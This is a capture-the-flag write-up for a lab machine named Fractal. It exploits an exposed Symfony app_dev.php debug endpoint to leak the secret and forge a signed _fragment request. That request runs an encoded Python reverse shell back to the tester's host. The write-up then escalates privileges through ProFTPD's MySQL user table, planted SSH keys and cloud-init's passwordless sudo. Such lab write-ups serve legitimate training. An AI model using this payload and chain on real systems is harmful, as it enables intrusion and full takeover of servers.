Write-ups

Explore

Write-ups

OS-P200-Fractal

2024-02-03

OS-P200-Fractal

Difficulty (by community)

Very Hard

Difficulty (by me)

Intermediate

Date

2024-02-03

Time Spent

4 hrs

Skills Coverage

SQL

PHP

cloud-init

Methodologies

Port scan and service discovery

Ports 21, 22 and 80 are open.

Browsing the HTTP index reveals that the PHP framework Symfony is being used according to Wappalyze.

Perform url enumuration → robot.txt → app_dev.php

Additionally,

{Hacktricks} Symfony #other-debug-enabled-endpoints⁠

informs us that this file serves as a debug entry point, granting access to profilers and configurations without requiring a password.

RCE via Symfony

Obtain the Symfony secret token.

The secret may be passed from the environment:

http://192.168.232.233/app_dev.php/_profiler/phpinfo⁠

⁠

Read it from configuration file:

http://192.168.232.233/app_dev.php/_profiler/open?file=app/config/parameters.yml&line=0⁠

⁠

Construct the RCE Url and sign it

{Hackgricks} Symfony #executing-code-with-the-help-of-secret⁠

, notices:

Some PHP versions do not allow calling functions with "by-reference" parameters like system($command, &$return_value). Choose an appropriate function and use shell_exec($cmd) instead.

Consider that a firewall or network policy might be in place on the target system, so select a commonly whitelisted port such as 80.

page='http://192.168.232.233/app_dev.php/_fragment?_path=cmd%3Dpython3%2520-c%2520%2527import%2520os%252Cpty%252Csocket%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528%2522192.168.45.244%2522%252C4444%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cf%2529for%2520f%2520in%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fbash%2522%2529%2527%26_controller%3Dshell_exec'

echo "$page""&_hash="$(php -r "echo(urlencode(base64_encode(hash_hmac('sha256', '$page', '$secret', 1))) . PHP_EOL);")

Enum the system via reverse-shell we got (as user www-data)

Execute the linpea.sh script and conduct preliminary investigations, we found:

Services running: Proftpd on port 21, MySql on local port 3306.

Cloud-init is being used (/etc/cloud, /var/log/cloud-init.log, /var/log/cloud-init-output.log)

The file local.txt can be accessed by the www-data user and is located in /home/benoit.

Upon initial inspection, user permissions appear to be well organized and there are no vulnerable SUID binaries.

The system and its components are up-to-date with no known exploits available at this time.

At this stage, our hypotheses and next steps to consider for exploration include the following:

The current user permission we obtained is restrictive, but the ftp service allows us to explore the file system as another user, expanding our boundaries. → What’s the ACL of proftpd and where are they stored?

The webpage hosting is simple and lacks dynamic features that typically involve a database. We assume that the mysql instance holds data for symfony. In many scenarios, mysql also serves as an authentication backend for services like ssh and ftp. → Our focus will be on exploring mysql as a configuration hub for other services during an extended phase of investigation, rather than prioritizing it as a proactive investigation with high urgency.

The server's configuration and footprints suggest it is initialized with cloud-init. There is a possibility of misconfiguration or sensitive information leakage through logs. However, since cloud-init is widely used in the context of cloud, we are uncertain whether it is simply a normal step in the provisioning process or a vulnerable source that provides additional information. → We will investigate cloud-init last if we don't find any clues before.

Review the web app again before we proceed with investigating other system components.

PhpAdmin and Symfony have their own MySql credentials, but there is no valuable information in their databases.

Investigate on proftpd

Proftpd utilizes mysql for authentication, with one user (ftpuser) in the database linked to the www-data Linux user.

The server configuration file sets SQLMinID to 33 (www-data), preventing direct escalation to root (0).

Upon reviewing /etc/passwd, two interesting accounts are identified:

syslog (uid: 105): We can access syslog/cloud-init-output.log and other log files that may contain sensitive information.

benoit (uid: 1000): By writing authorized_keys to this user's home directory, we can obtain an interactive shell. However, there are no files exclusively owned by this user based on the find command results, indicating no obvious privilege escalation opportunity.

To gather more information before proceeding further operations, we decide to investigate cloud-init in depth.

Investigate on cloud-init

Logs: In certain versions of cloud-init, password hashes may be leaked in the cloud-init-output.log and syslog files. To review these logs, we will first need to escalate our privileges to the syslog user. Therefore, this step will be performed later.

The configuration file reveals that the default user has "sudo" privileges without requiring a password for running any program. → Our objective is now clear - we will escalate our privileges to the user beniot (uid: 1000) and utilize sudo to gain root access.

# File Location: /etc/cloud/cloud.cfg

# A set of users which may be applied and/or used by various modules

# when a 'default' entry is found it will reference the 'default_user'

# from the distro configuration specified below

users:

- default

system_info:

default_user:

sudo: ["ALL=(ALL) NOPASSWD:ALL"]

Execute the PrviEsc plan

Add a new FTP user to the MySQL database.

Upload authorized_keys to that user’s home directory.

Establish an SSH session using user(benoit) and the identity certification.

Utilize sudo privileges to gain root access.

Take-away

⁠

Want to print your doc?
This is not the way.

Try clicking the ⋯ next to your doc name or using a keyboard shortcut (

CtrlP

) instead.